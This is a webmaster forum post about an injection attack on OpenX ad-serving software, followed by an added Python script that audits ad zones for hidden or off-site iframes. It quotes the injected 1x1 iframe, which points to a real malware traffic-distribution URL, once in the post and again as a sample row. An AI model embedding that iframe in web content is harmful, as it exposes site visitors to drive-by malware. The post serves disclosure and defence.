AshSimmonds

Just a quick note for any folks running a site and using the OpenX banner ad serving software: this morning AE was hit by an attack where an IFRAME was embedded within the banner script, which requests data from a malware site.

In our case the actual link was:

Code:
<iframe src="http://194.8.250.219/tds/in.cgi?default" width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no"></iframe>
...which for some reason is a Google server, so if you are logged into your Google account, Google's break out of frames script would redirect you back to Google homepage.

The IP inserted is different on many other people's servers; you can find them by Googling OpenX tds/in.cgi.

The basics are that the malware iframe code was injected into the MySQL database somehow into the "Append and prepend settings" in OpenX where it tells the server to "Always append the following HTML code to banners displayed by this zone".

Just remove that append code and it's fixed - but it will be annoying if you're running dozens of banners. Lucky for me, we don't have many advertisers yet. :thumbsup:

I think I'll be using this opportunity to move away from OpenX. Has anyone tried Google Ad Manager/DoubleClick for Publishers?

Here's an example of what it looks like in the admin part of the banner, and where the code has been injected:
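
Added example (not part of the original post, and not OpenX code): a small audit that flags hidden or off-site iframes in append/prepend values, so dozens of zones and banners can be checked in one pass instead of by hand. The row layout `(record_type, record_id, field, html)`, the `ALLOWED_HOSTS` set and `ads.example.com` are assumptions; export the real append/prepend values from your own database in that shape.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the site legitimately embeds from (assumption: adjust per site).
ALLOWED_HOSTS = {"ads.example.com"}

class IframeFinder(HTMLParser):
    """Collects the attributes of every <iframe> in an HTML fragment."""
    def __init__(self):
        super().__init__()
        self.iframes = []
    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})

def _tiny(value):
    """True for a dimension of 0 or 1 pixel, e.g. '1', '1px', '0'."""
    digits = value.strip().lower().replace("px", "")
    return digits.isdigit() and int(digits) <= 1

def suspicious_iframes(html):
    """Return (src, reasons) for each iframe that looks injected."""
    finder = IframeFinder()
    finder.feed(html or "")
    findings = []
    for attrs in finder.iframes:
        host = urlparse(attrs.get("src", "")).hostname or ""
        reasons = []
        if _tiny(attrs.get("width", "")) or _tiny(attrs.get("height", "")):
            reasons.append("hidden (<=1px)")
        if host and host not in ALLOWED_HOSTS:
            reasons.append("unlisted host " + host)
        if reasons:
            findings.append((attrs.get("src", ""), reasons))
    return findings

def scan(rows):
    """rows: (record_type, record_id, field, html) tuples exported from the ad server."""
    return [(t, i, f, hit) for t, i, f, html in rows for hit in suspicious_iframes(html)]

# Constructed sample rows; the second holds the iframe quoted in the post.
SAMPLE_ROWS = [
    ("zone", 1, "append", ""),
    ("zone", 2, "append", '<iframe src="http://194.8.250.219/tds/in.cgi?default" width="1" height="1" frameborder="0" scrolling="no"></iframe>'),
    ("banner", 7, "prepend", '<iframe src="https://ads.example.com/slot" width="300" height="250"></iframe>'),
]

if __name__ == "__main__":
    print(*scan(SAMPLE_ROWS), sep="\n")
```

Any row it reports should be cleared in the admin UI or the database and then rechecked, since the post does not establish how the value was written in the first place.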